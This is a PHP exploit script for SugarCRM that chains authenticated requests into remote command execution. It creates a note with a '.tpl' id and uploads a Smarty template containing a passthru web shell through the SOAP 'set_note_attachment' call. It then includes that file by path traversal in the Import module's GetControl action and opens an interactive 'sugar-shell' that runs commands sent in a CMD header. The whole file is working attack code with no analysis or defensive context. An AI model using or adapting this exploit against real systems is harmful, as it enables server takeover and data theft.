<?php

set_time_limit(0);
error_reporting(E_ERROR);

if (!extension_loaded("curl")) die("[+] cURL extension required!\n");

if ($argc != 4) die("Usage: php $argv[0] <URL> <username> <password>\n");

list($url, $user, $pass) = [$argv[1], $argv[2], $argv[3]];

print "[+] Logging in with username '{$user}' and password '{$pass}'\n";

$ch = curl_init();

$params = ["username" => $user, "password" => $pass, "grant_type" => "password", "client_id" => "sugar"];

curl_setopt($ch, CURLOPT_URL, "{$url}rest/v10/oauth2/token");
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($params));
curl_setopt($ch, CURLOPT_HTTPHEADER, ["Content-Type: application/json"]);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);

if (($token = (json_decode(curl_exec($ch)))->access_token) == null) die("[+] Login failed!\n");

print "[+] Creating new Notes bean\n";

$note_id = time().".tpl";

curl_setopt($ch, CURLOPT_URL, "{$url}rest/v10/Notes");
curl_setopt($ch, CURLOPT_HTTPHEADER, ["Content-Type: application/json", "OAuth-Token: {$token}"]);
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode(["id" => $note_id]));

if (!preg_match('/"id":"'.$note_id.'"/', curl_exec($ch))) die("[+] Bean creation failed!\n");

require_once("./lib/nusoap.php");
$client = new nusoap_client("{$url}soap.php", false);

if (($err = $client->getError()))
{
	echo "\nConstructor error: $err";
	echo "\nDebug: " . $client->getDebug() . "\n";
	die();
}

print "[+] Sending SOAP login request\n";

$params = ["user_auth" => ["user_name" => $user, "password" => $pass]];
$session = $client->call('login', $params);

if ($session['id'] == -1) die("[+] SOAP login failed!\n");

print "[+] Uploading template through 'set_note_attachment'\n";

$params = ["session" => $session['id'], "note" => ["id" => $note_id, "file" => base64_encode("{php}passthru(\$_SERVER['HTTP_CMD']);{/php}")]];

$result = $client->call("set_note_attachment", $params);

print "[+] Getting PHPSESSID through BWC login\n";

curl_setopt($ch, CURLOPT_URL, "{$url}rest/v10/oauth2/bwc/login");
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode([]));
curl_setopt($ch, CURLOPT_HEADER, true);

if (!preg_match("/PHPSESSID=([^;]+);/", curl_exec($ch), $sid)) die("[-] Session ID not found!\n");

print "[+] Launching shell\n";

$note_id = substr($note_id, 0, -4);

curl_setopt($ch, CURLOPT_URL, "{$url}index.php?module=Import&action=GetControl&import_module=Bugs&field_name=/test");
curl_setopt($ch, CURLOPT_HTTPHEADER, ["Cookie: PHPSESSID={$sid[1]}"]);
curl_setopt($ch, CURLOPT_POST, false);
curl_setopt($ch, CURLOPT_HEADER, false);

curl_exec($ch);

curl_setopt($ch, CURLOPT_URL, "{$url}index.php?module=Import&action=GetControl&import_module=Bugs&field_name=/../../../../upload/{$note_id}");

while(1)
{
    print "\nsugar-shell# ";
    if (($cmd = trim(fgets(STDIN))) == "exit") break;
    curl_setopt($ch, CURLOPT_HTTPHEADER, ["CMD: ".$cmd, "Cookie: PHPSESSID={$sid[1]}"]);
    ($r = curl_exec($ch)) ? print $r : die("\n[+] Exploit failed!\n");
}